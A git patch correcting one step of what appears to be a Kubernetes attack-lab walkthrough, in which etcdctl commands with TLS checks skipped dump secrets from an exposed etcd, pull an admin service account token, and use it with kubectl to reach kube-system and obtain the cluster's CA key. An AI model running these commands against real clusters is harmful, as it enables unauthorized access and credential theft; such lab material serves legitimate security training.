From 8c424f5caab1b6b2889945c80600c909f6ce0b4e Mon Sep 17 00:00:00 2001 From: MrIntern Date: Thu, 18 Aug 2022 13:37:34 +0100 Subject: [PATCH] fix broken command /registry/secrets/kube-system/admins-account-token-RAND doesn't exist, but a very similarly worded account token does: /registry/secrets/default/admins-account-token-RAND Upon testing, this account token (even though its associated with the default namespace) gives you access to the kube-system namespace and is sufficient for obtaining ca.key I've replaced the broken command with a working one to avoid future confusion. --- Scenario Walkthroughs/etcd.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Scenario Walkthroughs/etcd.md b/Scenario Walkthroughs/etcd.md index feea617..00eef13 100644 --- a/Scenario Walkthroughs/etcd.md +++ b/Scenario Walkthroughs/etcd.md @@ -5,7 +5,7 @@ 3. First we need to dump some secrets out of the etcd database `etcdctl --insecure-skip-tls-verify --insecure-transport=false --endpoints=https://[CLUSTERIP]:2379 get / --prefix --keys-only | grep token` 4. Then we'll need a service account token to authenticate to the cluster with. Looking through the list of accounts we can see an admins-account - `etcdctl --insecure-skip-tls-verify --insecure-transport=false --endpoints=https://[IP]:2379 get /registry/secrets/kube-system/admins-account-token-[RAND]` + `etcdctl --insecure-skip-tls-verify --insecure-transport=false --endpoints=https://[IP]:2379 get /registry/secrets/default/admins-account-token-[RAND]` The service account token starts with ey and ends just before the word `kubernetes.io` in the token. 5. With the service token we can use kubectl , first get the API pod name `kubectl --insecure-skip-tls-verify -shttps://[IP]:6443/ --token="[TOKEN]" -n kube-system get po`